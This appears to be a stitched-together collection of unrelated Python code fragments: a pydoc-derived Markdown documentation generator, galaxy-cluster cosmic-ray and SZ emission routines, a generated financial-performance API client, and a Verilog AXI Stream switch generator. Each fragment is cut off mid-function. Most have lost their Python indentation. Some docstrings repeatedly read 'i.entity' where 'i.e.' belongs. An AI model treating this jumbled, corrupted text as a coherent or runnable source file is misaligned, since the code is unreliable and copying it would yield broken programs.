    escaping) so it can be embedded in the generated markup."""

    def repr_string(self, x, level):
        raw = super(MarkdownRepr, self).repr_string(x, level)
        return clean(raw)

    def repr1(self, x, level):
        raw = super(MarkdownRepr, self).repr1(x, level)
        return clean(raw)
class MarkdownDoc(pydoc.HTMLDoc, object):
"""
FIXME: doc* functions need an extra "level" parameter so we can the fitting h[1-6]
This required overriding the 'document' function, but can only be done once all doc*
functions are implemented.
"""
level_offset = None
local = None
index_url = None
def __init__(self, level_offset=0, local=False, index_url='./'):
self.level_offset = level_offset
self.local = local
self.index_url = index_url
# some utility functions first
def getdoc(self, object):
doc = pydoc.getdoc(object)
return '\n\n<pre class="doc" markdown="0">%s</pre>\n\n' % (doc)
def heading(self, level, content, html=True):
""" Create a HTML heading """
level += self.level_offset
if level > 6:
level = 6 # HTML headings only go from h1 to h6
if html:
return "<h%d>%s</h%d>" % (level, content, level)
else:
return "\n\n%s %s\n\n" % ("#" * level, content)
def url(self, name):
""" Create URL for a documentable thing. Mainly intended for subclassing """
return "./%s.html" % name # TODO proper
def listing(self, items, formatter=None):
if formatter is not None:
items = ['<li>' + formatter(item) + '</li>' for item in items]
# <ul> might not be semantically correct, <ol> a better choice?
return '<ul class="list">%s</ul>' % ''.join(items)
    def preformat(self, text):
        """Override of the parent hook: return the text unchanged (no
        additional escaping/preformatting for markdown output)."""
        return text
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return '<span class="shadowed">name</span>'
if path:
url = self.url('%s.%s' % (path, name))
else:
url = self.url(name)
if ispackage:
text = '<span class="package-name">%s</span> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def modulelink(self, object):
"""Make a link for a module."""
# return '<a href="%s">%s</a>' % (self.url(object.__name__), object.__name__) # TODO No module links because global modules are included
return '%s' % (object.__name__)
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s#%s">%s</a>' % (
self.url(module.__name__), name, pydoc.classname(object, modname))
return pydoc.classname(object, modname)
def formattree(self, tree, modname, parent=None):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = '<ul class="tree">'
for entry in tree:
result += '<li>'
if type(entry) is type(()): # means this is info about a class
c, bases = entry
result += '<span class="class-name">' + \
self.classlink(c, modname) + '</span>'
if bases and bases != (parent,):
parents = map(
lambda c, m=modname: pydoc.classname(c, m), bases)
result += '(<span class="bases">%s</span>)' % ', '.join(parents)
# means this is a list of child classes of the previous item
elif type(entry) is type([]):
result += self.formattree(entry, modname, c)
result += '</li>'
result += '</ul>'
return result
    def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
        """Mark up some plain text, given a context of symbols to look for.

        Each context dictionary maps object names to anchor names.
        i.e. Replaces plaintext URLs with linked versions
        Also escapes input text

        The single regex alternation matches, in priority order: http/ftp
        URLs, RFC references, PEP references, and bare/self-qualified names.
        Text between matches is escaped and emitted verbatim.

        NOTE(review): ``self.escape`` and ``self.namelink`` are inherited from
        pydoc.HTMLDoc -- confirm their behaviour matches this module's output.
        """
        escape = escape or self.escape
        results = []
        here = 0
        pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
                             r'RFC[- ]?(\d+)|'
                             r'PEP[- ]?(\d+)|'
                             r'(self\.)?(\w+))')
        # scan the text match by match; 'here' tracks the end of the last match
        while True:
            match = pattern.search(text, here)
            if not match:
                break
            start, end = match.span()
            results.append(escape(text[here:start]))
            all, scheme, rfc, pep, selfdot, name = match.groups()
            if scheme:
                # plain URL: escape it and link it, opening in a new tab
                url = escape(all).replace('"', '&quot;')
                results.append(
                    '<a href="%s" target="_blank" rel="noreferrer noopener">%s</a>' % (url, url))
            elif rfc:
                url = 'https://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
                results.append(
                    '<a href="%s" target="_blank" rel="noreferrer noopener">%s</a>' % (url, escape(all)))
            elif pep:
                url = 'https://www.python.org/dev/peps/pep-%04d/' % int(pep)
                results.append(
                    '<a href="%s" target="_blank" rel="noreferrer noopener">%s</a>' % (url, escape(all)))
            elif selfdot:
                # Create a link for methods like 'self.method(...)'
                # and use <strong> for attributes like 'self.attr'
                if text[end:end+1] == '(':
                    results.append('self.' + self.namelink(name, methods))
                else:
                    results.append('self.<strong>%s</strong>' % name)
            elif text[end:end+1] == '(':
                # bare name followed by '(' -> try methods, functions, classes
                results.append(self.namelink(name, methods, funcs, classes))
            else:
                results.append(self.namelink(name, classes))
            here = end
        # trailing text after the last match
        results.append(escape(text[here:]))
        return ''.join(results)
# now the things doing the heavy lifting
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML5 documentation for a module object."""
level = 1 # FIXME: use passed level in the future
components = {} # where we're storing all components to be output
name = object.__name__ # ignore the passed-in name. not passed in anyways?
try:
all = object.__all__
except AttributeError:
all = None
parts = name.split('.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s">%s</a>' %
(
self.url('.'.join(parts[:i+1])),
parts[i]
)
)
head_link = '.'.join(links + parts[-1:])
try:
path = inspect.getabsfile(object)
if self.local:
url = path
if sys.platform == 'win32': # in case i want to give this to the python project
import nturl2path
url = nturl2path.pathname2url(path)
components['fileref'] = '<a class="file-reference" href="file:%s">%s</a>' % (
url, path)
else:
components['fileref'] = '<span class="file-reference">%s</span>' % path
except TypeError:
components['fileref'] = '<span class="file-reference builtin">(built-in)</span>'
components['fileref'] = '' # TODO remove fileref
info = []
if hasattr(object, '__version__'):
version = pydoc._binstr(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(pydoc._binstr(object.__date__)))
# build the main heading
if info:
components['head'] = self.heading(
level + 1, '%s (<span class="info">%s)' % (head_link, ', '.join(info)))
else:
# heading which is a linked representation of the module "address"
components['head'] = self.heading(level + 1, head_link)
# get the official url of object, if any
docloc = self.getdocloc(object)
if docloc is not None:
components['docloc'] = '<a class="official-docs" href="%s" target="_blank" rel="noreferrer noopener">Module Docs</a>' % docloc
else:
components['docloc'] = ''
# collect modules, classes, functions and data in `object`
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if pydoc.visiblename(key, all, object):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + \
key # key used as URL fragment
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = self.url(
modname) + '#' + key # key used as URL fragment
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if pydoc.visiblename(key, all, object):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value):
fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, pydoc.isdata):
if pydoc.visiblename(key, all, object):
data.append((key, value))
# build documentation for the thing passed in
components['doc'] = self.getdoc(object)
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
components['modules'] = self.heading(
level + 2, 'Package Contents') + self.listing(modpkgs, formatter=self.modpkglink)
elif modules:
components['modules'] = self.heading(level + 2, 'Modules') + self.listing(
[module for _, module in modules], formatter=self.modulelink)
if classes:
classlist = [cls for _, cls in classes]
classtree = self.formattree(
inspect.getclasstree(classlist, 1), name)
classdocs = []
for key, value in classes:
classdocs.append(self.document(value, key, name, fdict, cdict))
components['classes'] = self.heading(level + 2, 'Classes')
components['classes'] += classtree
components['classes'] += '<dl class="classes">'
components['classes'] += '\n'.join(classdocs)
components['classes'] += '</dl>'
if funcs:
docs = []
for key, value in funcs:
docs.append(self.document(value, key, name, fdict, cdict))
components['funcs'] = self.heading(level + 2, 'Functions')
components['funcs'] += '<dl class="functions">'
components['funcs'] += '\n'.join(docs)
components['funcs'] += '</dl>'
if data:
docs = []
for key, value in data:
docs.append(self.document(value, key))
components['data'] = self.heading(level + 2, 'Data')
components['data'] += '<dl class="data">'
components['data'] += '\n'.join(docs)
components['data'] += '</dl>'
if hasattr(object, '__author__'):
components['author'] | |
dN_dEdVdt1 + dN_dEdVdt2
elif flavor == 'numu':
dN_dEdVdt = model.neutrino_spectrum(energy, radius, n_H, flavor='numu').T
elif flavor == 'nue':
dN_dEdVdt = model.neutrino_spectrum(energy, radius, n_H, flavor='nue').T
else :
raise ValueError('Only all, numu and nue flavor are available.')
# Case of K14
elif model == 'Kelner2006':
model = K06.PPmodel(Jp,
Epmin=self._Epmin,
Epmax=self._Epmax,
NptEpPd=self._Npt_per_decade_integ)
# Extract the spectrum
if flavor == 'all':
dN_dEdVdt1 = model.neutrino_spectrum(energy, radius, n_H, limit=limit, flavor='numu').T
dN_dEdVdt2 = model.neutrino_spectrum(energy, radius, n_H, limit=limit, flavor='nue').T
dN_dEdVdt = dN_dEdVdt1 + dN_dEdVdt2
elif flavor == 'numu':
dN_dEdVdt = model.neutrino_spectrum(energy, radius, n_H, limit=limit, flavor='numu').T
elif flavor == 'nue':
dN_dEdVdt = model.neutrino_spectrum(energy, radius, n_H, limit=limit, flavor='nue').T
else :
raise ValueError('Only all, numu and nue flavor are available.')
# Error
else:
raise ValueError('Only Kafexhiu2014 and Kelner2006 models are available.')
return dN_dEdVdt.to('GeV-1 cm-3 s-1')
#==================================================
# Get the secondary electron spectrum
#==================================================
def get_cre2_2d(self, energy=np.logspace(-2,7,100)*u.GeV, radius=np.logspace(0,4,100)*u.kpc):
"""
Compute the electron spectrum as dN/dEdV = f(E, r)
Parameters
----------
- radius (quantity): the physical 3d radius in units homogeneous to kpc, as a 1d array
- energy (quantity) : the physical energy of electrons
Outputs
-------
- dN_dEdV (np.ndarray): the number of electrons per unit volume and energy
"""
# In case the input is not an array
energy = model_tools.check_qarray(energy, unit='GeV')
radius = model_tools.check_qarray(radius, unit='kpc')
# Get the injection rate between the min and max possible, i.e. Epmax
emin = np.amax([(const.m_e*const.c**2).to_value('GeV'),
np.amin(energy.to_value('GeV'))])*u.GeV # min of CRe energy requested, or m_e c^2
emax = self._Epmax
eng = model_tools.sampling_array(emin, emax, NptPd=self._Npt_per_decade_integ, unit=True)
dN_dEdVdt = self.get_rate_cre2(eng, radius) # This is the time consumming part
# Apply the losses
dN_dEdV = self.apply_steady_state_electron_loss(energy, radius, dN_dEdVdt, eng, radius)
return dN_dEdV.to('GeV-1 cm-3')
#==================================================
# Get the CR secondary electron density profile
#==================================================
def get_density_cre2_profile(self, radius=np.logspace(0,4,100)*u.kpc,
Emin=None, Emax=None, Energy_density=False):
"""
Compute the cosmic ray electron density profile, integrating energies
between Emin and Emax.
Parameters
----------
- radius (quantity): the physical 3d radius in units homogeneous to kpc, as a 1d array
- Emin (quantity): the lower bound for energy integration
- Emax (quantity): the upper bound for energy integration
- Energy_density (bool): if True, then the energy density is computed. Otherwise,
the number density is computed.
Outputs
----------
- density (quantity): in unit of cm-3 or GeV cm-3
"""
# In case the input is not an array
radius = model_tools.check_qarray(radius, unit='kpc')
# Define energy
if Emin is None:
Emin = (const.m_e*const.c**2).to('GeV')
if Emax is None:
Emax = self._Epmax
# Integrate over the spectrum
eng = model_tools.sampling_array(Emin, Emax, NptPd=self._Npt_per_decade_integ, unit=True)
dN_dEdV = self.get_cre2_2d(eng, radius)
if Energy_density:
profile = (model_tools.trapz_loglog(np.vstack(eng.to_value('GeV'))*u.GeV * dN_dEdV,
eng, axis=0)).to('GeV cm-3')
else:
profile = (model_tools.trapz_loglog(dN_dEdV, eng, axis=0)).to('cm-3')
return radius, profile
#==================================================
# Get the CR secondary spectrum
#==================================================
def get_cre2_spectrum(self, energy=np.logspace(-2,7,100)*u.GeV, Rmax=None):
"""
Compute the cosmic ray proton spectrum, integrating radius
between 0 and Rmax.
Parameters
----------
- energy (quantity) : the physical energy of CR protons
- Rmax (quantity): the radius within with the spectrum is computed
(default is R500)
Outputs
----------
- spectrum (quantity): in unit of GeV-1
"""
# In case the input is not an array
energy = model_tools.check_qarray(energy, unit='GeV')
# Define the radius for integration
if Rmax is None:
Rmax = self._R500
# Integrate over the considered volume
rmin = np.amin([self._Rmin.to_value('kpc'), Rmax.to_value('kpc')/10])*u.kpc # make sure we go low enough
rad = model_tools.sampling_array(rmin, Rmax, NptPd=self._Npt_per_decade_integ, unit=True)
# To improve precision around R_truncation in integration
if np.amax(rad) > self._R_truncation:
rad = rad.insert(0, self._R_truncation)
rad.sort()
# Get the differential spectrum/profile
dN_dEdV = self.get_cre2_2d(energy, rad)
# Integrate
spectrum = model_tools.trapz_loglog(4*np.pi*rad**2 * dN_dEdV, rad)
return energy, spectrum.to('GeV-1')
#==================================================
# Get the synchrotron spectrum
#==================================================
def get_rate_synchrotron(self, energy=np.logspace(-9,-2,100)*u.eV, radius=np.logspace(0,4,100)*u.kpc):
"""
Compute the synchrotron density as dN/dEdVdt = f(E, r)
Parameters
----------
- energy (quantity) : the physical energy of synchrotron photons
- radius (quantity): the physical 3d radius in units homogeneous to kpc, as a 1d array
Outputs
----------
- dN_dEdVdt (np.ndarray): the differntial production rate
"""
# In case the input is not an array
energy = model_tools.check_qarray(energy, unit='eV')
radius = model_tools.check_qarray(radius, unit='kpc')
# Get the magnetic field
radius, B = self.get_magfield_profile(radius)
# Parse the CRe distribution: returns call function[rad, energy] amd returns f[rad, energy]
def Je(rad, eng):
if self._X_crp_E['X'] == 0:
Sec_e = 0
else:
Sec_e = self.get_cre2_2d(eng*u.GeV, rad*u.kpc).to_value('GeV-1 cm-3').T
if self._X_cre1_E['X'] == 0:
Pri_e = 0
else:
Pri_e = self.get_cre1_2d(eng*u.GeV, rad*u.kpc).to_value('GeV-1 cm-3').T
return Pri_e + Sec_e
# Define the model
model = cluster_electron_emission.ClusterElectronEmission(Je,
Eemin=(const.m_e*const.c**2).to('GeV'),
Eemax=self._Epmax,
NptEePd=self._Npt_per_decade_integ)
# Extract the spectrum: what is long is evaluating Je inside the code
dN_dEdVdt = model.synchrotron(energy, radius_input=radius, B=B).T
return dN_dEdVdt.to('GeV-1 cm-3 s-1')
#==================================================
# Get the IC spectrum
#==================================================
def get_rate_ic(self, energy=np.logspace(-2,7,100)*u.GeV, radius=np.logspace(0,4,100)*u.kpc):
"""
Compute the inverse compton density as dN/dEdVdt = f(E, r)
Note
----------
At high energy, the IC emission analytical parametrization present sharp features
which require a rather high NptEePD (10 is clearly to low and will induce wiggles
in the spectrum)
Parameters
----------
- energy (quantity) : the physical energy of photons
- radius (quantity): the physical 3d radius in units homogeneous to kpc, as a 1d array
Outputs
----------
- dN_dEdVdt (np.ndarray): the differntial production rate
"""
# In case the input is not an array
energy = model_tools.check_qarray(energy, unit='GeV')
radius = model_tools.check_qarray(radius, unit='kpc')
# Parse the CRe distribution: returns call function[rad, energy] amd returns f[rad, energy]
def Je(rad, eng):
if self._X_crp_E['X'] == 0:
Sec_e = 0
else:
Sec_e = self.get_cre2_2d(eng*u.GeV, rad*u.kpc).to_value('GeV-1 cm-3').T
if self._X_cre1_E['X'] == 0:
Pri_e = 0
else:
Pri_e = self.get_cre1_2d(eng*u.GeV, rad*u.kpc).to_value('GeV-1 cm-3').T
return Pri_e + Sec_e
# Define the model
model = cluster_electron_emission.ClusterElectronEmission(Je,
Eemin=(const.m_e*const.c**2).to('GeV'),
Eemax=self._Epmax,
NptEePd=self._Npt_per_decade_integ)
# Extract the spectrum: what is long is evaluating Je inside the code
dN_dEdVdt = model.inverse_compton(energy, radius_input=radius, redshift=self._redshift).T
return dN_dEdVdt.to('GeV-1 cm-3 s-1')
#==================================================
# Get the SZ rate
#==================================================
    def get_rate_sz(self, frequency=np.logspace(1,3,100)*u.GHz, radius=np.logspace(0,4,100)*u.kpc,
                    Compton_only=False):
        """
        Compute the SZ emission per unit volume, or the Compton parameter per unit distance.

        Parameters
        ----------
        - frequency (quantity) : the physical frequency of photons
        - radius (quantity): the physical 3d radius in units homogeneous to kpc, as a 1d array
        - Compton_only (bool): Output the Compton parameter instead of the spectrum. In the case of
        Compton only, with relativistic correction, y is weighted by the ratio f(nu,T)/f(nu,0)

        Outputs
        ----------
        - output (np.ndarray): Compton parameter per distance (kpc-1) when
          Compton_only is True, otherwise the spectral power density
          (eV s-1 cm-3 Hz-1 sr-1)
        """
        # In case the input is not an array
        frequency = model_tools.check_qarray(frequency, unit='GHz')
        radius = model_tools.check_qarray(radius, unit='kpc')
        # Get the pressure and temperature profile
        radius, temperature = self.get_temperature_gas_profile(radius)
        radius, pressure = self.get_pressure_gas_profile(radius)
        # Correct temperature for nan (e.g. beyond Rtrunc): x/x != 1 flags NaN entries
        temperature[temperature/temperature != 1] = 0
        # Get the SZ spectrum
        # NOTE(review): f_nu and f_nu0 are unused in the Compton_only branch
        # (the relativistic weighting is commented out below) -- confirm
        # whether the weighting should be re-enabled or the computation moved
        # into the else branch
        f_nu = cluster_szspec.tsz_spec_relativistic(frequency, temperature) # 2D: Nfreq, Ntemp
        f_nu0 = cluster_szspec.tsz_spec_relativistic(frequency, temperature*0) # Reference non relativistic
        I0 = cluster_szspec.get_I0_CMB()
        # Get SZ power per unit volume and frequency
        if Compton_only:
            # Compton parameter per unit length: sigma_T P / (m_e c^2)
            compton = model_tools.replicate_array(const.sigma_T/(const.m_e*const.c**2) * pressure,
                                                  len(frequency), T=False)
            #compton_relat = compton * f_nu/f_nu0
            output = compton.to('kpc-1')
        else:
            compton = model_tools.replicate_array(const.sigma_T/(const.m_e*const.c**2) * pressure,
                                                  len(frequency), T=False)
            dE_dtdVdfdO = compton * I0*f_nu
            output = dE_dtdVdfdO.to('eV s-1 cm-3 Hz-1 sr-1')
        return output
#==================================================
# Compute a Xspec table versus temperature
#==================================================
def make_xspec_table(self, Emin=0.1*u.keV, Emax=2.4*u.keV,
Tmin=0.1*u.keV, Tmax=50.0*u.keV, nbin=100,
nH=0.0/u.cm**2, file_HI=None, visu_nH=False,
model='APEC',
resp_file=None, data_file=None, app_nH_model=False):
"""
Generate an xspec table as a function of temperature, for the cluster.
This require xspec to be installed.
It requires having a hydrogen column density map in the Healpix format
if nH should be read from a map.
Instrumental response files are needed for computing count rates (in ph/s)
Parameters
----------
- Emin (quantity): Xray band minimal energy (RASS Hard is 0.5-2.4 keV, RASS Soft is 0.1-0.4 keV)
- Emax (quantity): Xray band maximal energy
- | |
39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: A stat type -- /statistics
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_client_performance_using_get_with_http_info(client_id, **kwargs) # noqa: E501
else:
(data) = self.get_client_performance_using_get_with_http_info(client_id, **kwargs) # noqa: E501
return data
def get_client_performance_using_get_with_http_info(self, client_id, **kwargs):  # noqa: E501
    """Client Performance  # noqa: E501

    Get information on the performance of a client using IRR (Internal Rate of Return). You must provide the unique client_id.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_client_performance_using_get_with_http_info(client_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str client_id: Client Id -/client (required)
    :param str active_premium_period: Q (quarterly), Monthly (M), Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
    :param str annualized_return_period: Q (quarterly), Monthly (M), Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
    :param str benchmark_id: Client Benchmark or Tenant Benchmark id -/benchmark
    :param date end_date: end date
    :param float hist_factor: Histogram factor - (statId: 39, default: 5)
    :param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
    :param float max_percentile_monte_carlo: max percentile for monte carlo, i.e. 80 - (statId: 62, default: 95)
    :param float mean_percentile_monte_carlo: mean percentile for monte carlo, i.e. 50 - (statId: 62, default: 50)
    :param float min_percentile_monte_carlo: min percentile for monte carlo, i.e. 20 - (statId: 62, default: 5)
    :param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
    :param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
    :param int n_path_monte_carlo: number of points for a simulation - (statId: 62, default: 100)
    :param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown - (statId: 46, default: 7)
    :param int n_rolling_volatility: number of days for Rolling n-day volatility - (statId: 34, default: 7)
    :param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
    :param str period_type: Quarter (Q), Monthly (M), Annually (Y), Daily (D) --caps matter, codes in () - Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
    :param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
    :param float risk_free_sharpe: risk free val sharpe - (statId: 49, default: 0)
    :param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
    :param float risk_free_treynor: risk free val treynor - (statId: 51, default: 0)
    :param date start_date: start date
    :param str stat: A stat type -- /statistics
    :param float var_conf_interval: VaR Confidence Interval (alpha), i.e. 99, 95, etc - (statId: 40, default: 95)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # query-string options accepted by this endpoint, in the order they
    # are appended to the request
    query_opt_names = [
        'active_premium_period', 'annualized_return_period', 'benchmark_id',
        'end_date', 'hist_factor', 'mar_down_side_deviation',
        'max_percentile_monte_carlo', 'mean_percentile_monte_carlo',
        'min_percentile_monte_carlo', 'moving_average_n_day',
        'n_day_returns', 'n_path_monte_carlo', 'n_rolling_max_drawdown',
        'n_rolling_volatility', 'num_sim_monte_carlo', 'period_type',
        'risk_free_alpha', 'risk_free_sharpe', 'risk_free_sortino',
        'risk_free_treynor', 'start_date', 'stat', 'var_conf_interval']
    # full accepted-keyword set: path param + query options + framework opts
    all_params = ['client_id'] + query_opt_names + [
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout']

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_client_performance_using_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'client_id' is set
    if params.get('client_id') is None:
        raise ValueError("Missing the required parameter `client_id` when calling `get_client_performance_using_get`")  # noqa: E501

    collection_formats = {}

    path_params = {'client_id': params['client_id']}  # noqa: E501

    # forward each supplied optional as a query-string pair, preserving
    # the declaration order above
    query_params = [(name, params[name])
                    for name in query_opt_names if name in params]

    header_params = {}
    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    return self.api_client.call_api(
        '/client/{client_id}/performance', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_goal_performance_using_get(self, client_id, goal_id, **kwargs): # noqa: E501
"""Goal Performance # noqa: E501
Get information on the performance of a goal using IRR (Internal Rate of Return). You must provide the unique goal_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_goal_performance_using_get(client_id, goal_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str client_id: Client associated with the account - /client (required)
:param str goal_id: Goal Id - /account (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Client Benchmark or Tenant Benchmark id -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: | |
#!/usr/bin/env python
"""
Generates an AXI Stream switch with the specified number of ports
"""
from __future__ import print_function
import argparse
import math
from jinja2 import Template
def main():
    """Parse command-line arguments and generate the switch module.

    Exits with status 1 if the output file cannot be written.
    """
    parser = argparse.ArgumentParser(description=__doc__.strip())
    parser.add_argument('-p', '--ports', type=int, default=[4], nargs='+', help="number of ports")
    parser.add_argument('-n', '--name', type=str, help="module name")
    parser.add_argument('-o', '--output', type=str, help="output file name")

    args = parser.parse_args()

    try:
        generate(**args.__dict__)
    except IOError as ex:
        print(ex)
        # raise SystemExit instead of calling the site-module exit()
        # helper, which is meant for interactive use and is not
        # guaranteed to exist (e.g. when running under `python -S`)
        raise SystemExit(1)
def generate(ports=4, name=None, output=None):
if type(ports) is int:
m = n = ports
elif len(ports) == 1:
m = n = ports[0]
else:
m, n = ports
if name is None:
name = "axis_switch_64_{0}x{1}".format(m, n)
if output is None:
output = name + ".v"
print("Opening file '{0}'...".format(output))
output_file = open(output, 'w')
print("Generating {0}x{1} port AXI Stream switch {2}...".format(m, n, name))
cm = int(math.ceil(math.log(m, 2)))
cn = int(math.ceil(math.log(n, 2)))
t = Template(u"""/*
Copyright (c) 2016-2017 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
*/
// Language: Verilog 2001
`timescale 1ns / 1ps
/*
* AXI4-Stream {{m}}x{{n}} switch (64 bit datapath)
*/
module {{name}} #
(
parameter DATA_WIDTH = 64,
parameter KEEP_WIDTH = (DATA_WIDTH/8),
parameter DEST_WIDTH = {{cn}},
{%- for p in range(n) %}
parameter OUT_{{p}}_BASE = {{p}},
parameter OUT_{{p}}_TOP = {{p}},
parameter OUT_{{p}}_CONNECT = {{m}}'b{% for p in range(m) %}1{% endfor %},
{%- endfor %}
// arbitration type: "PRIORITY" or "ROUND_ROBIN"
parameter ARB_TYPE = "ROUND_ROBIN",
// LSB priority: "LOW", "HIGH"
parameter LSB_PRIORITY = "HIGH"
)
(
input wire clk,
input wire rst,
/*
* AXI Stream inputs
*/
{%- for p in range(m) %}
input wire [DATA_WIDTH-1:0] input_{{p}}_axis_tdata,
input wire [KEEP_WIDTH-1:0] input_{{p}}_axis_tkeep,
input wire input_{{p}}_axis_tvalid,
output wire input_{{p}}_axis_tready,
input wire input_{{p}}_axis_tlast,
input wire [DEST_WIDTH-1:0] input_{{p}}_axis_tdest,
input wire input_{{p}}_axis_tuser,
{% endfor %}
/*
* AXI Stream outputs
*/
{%- for p in range(n) %}
output wire [DATA_WIDTH-1:0] output_{{p}}_axis_tdata,
output wire [KEEP_WIDTH-1:0] output_{{p}}_axis_tkeep,
output wire output_{{p}}_axis_tvalid,
input wire output_{{p}}_axis_tready,
output wire output_{{p}}_axis_tlast,
output wire [DEST_WIDTH-1:0] output_{{p}}_axis_tdest,
